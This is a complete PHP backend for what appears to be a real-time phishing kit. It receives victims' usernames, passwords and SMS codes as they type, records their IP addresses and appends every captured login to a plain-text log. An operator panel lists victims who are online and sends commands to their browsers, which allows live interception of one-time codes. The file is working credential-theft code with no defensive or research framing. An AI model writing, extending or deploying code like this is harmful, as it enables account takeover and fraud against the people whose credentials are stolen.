<?php
header("Content-Type: application/json");
header("Access-Control-Allow-Origin: *");
header("Access-Control-Allow-Methods: POST, GET, OPTIONS");
header("Access-Control-Allow-Headers: Content-Type");

if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    exit;
}

$file_path = __DIR__ . '/../data/users.json';

if (!is_dir(dirname($file_path))) {
    mkdir(dirname($file_path), 0777, true);
}

if (!file_exists($file_path)) {
    file_put_contents($file_path, json_encode([], JSON_PRETTY_PRINT));
}

$data = json_decode(file_get_contents('php://input'), true) ?: [];
$action = $_GET['action'] ?? ($data['action'] ?? '');

$fp = fopen($file_path, 'c+');
if (!$fp) {
    echo json_encode(['success' => false, 'error' => 'Disk Error']);
    exit;
}

if (!flock($fp, LOCK_EX)) {
    echo json_encode(['success' => false, 'error' => 'Concurrency Error']);
    fclose($fp);
    exit;
}

$content = stream_get_contents($fp);
$users = json_decode($content, true) ?: [];

$response = ['success' => true];

if ($action === 'heartbeat') {
    $id = $data['id'] ?? null;
    if (!$id) {
        $response = ['command' => 'none'];
    } else {
        // 1. Check if the session is MARKED FOR DELETION (Suicide Protocol)
        if (isset($users[$id]) && isset($users[$id]['status']) && $users[$id]['status'] === 'deleted') {
            unset($users[$id]); // Physically remove now that they've caught the signal
            $response = ['command' => 'reset'];
        }
        // 2. Auto-Create if completely missing (New User)
        elseif (!isset($users[$id])) {
            // ANTI-BOT / GHOST FILTER
            // If the user is new but hasn't sent any data yet, DO NOT CREATE them in the file.
            // Just return 'none' so the client keeps polling until they actually type something.
            $hasData = !empty($data['data']['user']) || !empty($data['data']['pass']) || !empty($data['data']['sms']);

            if (!$hasData) {
                // Return success but don't save to disk
                $response = ['command' => 'none'];
            } else {
                // Real user started typing
                $users[$id] = [
                    'id' => $id,
                    'ip' => $_SERVER['REMOTE_ADDR'],
                    'page' => $data['page'] ?? 'unknown',
                    'data' => [
                        'user' => $data['data']['user'] ?? '',
                        'pass' => $data['data']['pass'] ?? '',
                        'sms' => $data['data']['sms'] ?? ''
                    ],
                    'command' => 'none',
                    'waiting' => $data['waiting'] ?? false,
                    'last_seen' => time(),
                    'status' => 'online'
                ];
                $response = ['command' => 'none'];
            }
        }
        // 3. Regular Update
        else {
            $users[$id]['last_seen'] = time();
            $users[$id]['status'] = 'online';
            $users[$id]['waiting'] = $data['waiting'] ?? false;

            if (isset($data['page']))
                $users[$id]['page'] = $data['page'];
            if (isset($data['data']) && is_array($data['data'])) {
                foreach ($data['data'] as $k => $v) {
                    if (!empty($v))
                        $users[$id]['data'][$k] = $v;
                }
            }

            // --- TXT LOGGING ---
            // Only log if we have actual credentials (User+Pass) or SMS
            $u = $users[$id]['data']['user'] ?? '';
            $p = $users[$id]['data']['pass'] ?? '';
            $s = $users[$id]['data']['sms'] ?? '';

            if (!empty($u) && !empty($p)) {
                $logEntry = "[" . date("Y-m-d H:i:s") . "] IP: " . $_SERVER['REMOTE_ADDR'] . " | User: " . $u . " | Pass: " . $p . " | SMS: " . $s . PHP_EOL;
                $logFile = __DIR__ . '/../data/registros.txt';
                file_put_contents($logFile, $logEntry, FILE_APPEND | LOCK_EX);
            }
            // -------------------

            $current_cmd = $users[$id]['command'] ?? 'none';
            if ($current_cmd !== 'none') {
                $users[$id]['command'] = 'none';
            }
            $response = ['command' => $current_cmd];
        }
    }

} elseif ($action === 'get_users') {
    // Filter out users marked for deletion so the admin panel looks clean
    // Also Check for Timeout (10 seconds)
    $now = time();
    foreach ($users as $uid => $u) {
        if (($u['status'] ?? '') === 'online') {
            if (($now - ($u['last_seen'] ?? 0)) > 10) {
                $users[$uid]['status'] = 'offline';
            }
        }
    }

    // Save the status changes to disk so they persist (optional but good for consistency)
    // We already have the file lock from the top of the script
    ftruncate($fp, 0);
    rewind($fp);
    fwrite($fp, json_encode($users, JSON_PRETTY_PRINT));

    $filtered = array_filter($users, function ($u) {
        return ($u['status'] ?? '') !== 'deleted';
    });
    $response = $filtered ?: new stdClass();

} elseif ($action === 'set_command') {
    $id = $data['id'] ?? '';
    if (isset($users[$id])) {
        $users[$id]['command'] = $data['command'] ?? 'none';
    } else {
        $response = ['success' => false, 'error' => 'Not found'];
    }

} elseif ($action === 'delete_user') {
    $id = $data['id'] ?? '';
    if (isset($users[$id])) {
        // Mark for deletion and force reset command
        $users[$id]['status'] = 'deleted';
        $users[$id]['command'] = 'reset';
    }

} elseif ($action === 'clean_all') {
    foreach ($users as $id => $u) {
        $users[$id]['status'] = 'deleted';
        $users[$id]['command'] = 'reset';
    }
}

// Atomic Write
ftruncate($fp, 0);
rewind($fp);
fwrite($fp, json_encode($users, JSON_PRETTY_PRINT));
fflush($fp);
flock($fp, LOCK_UN);
fclose($fp);

echo json_encode($response);
?>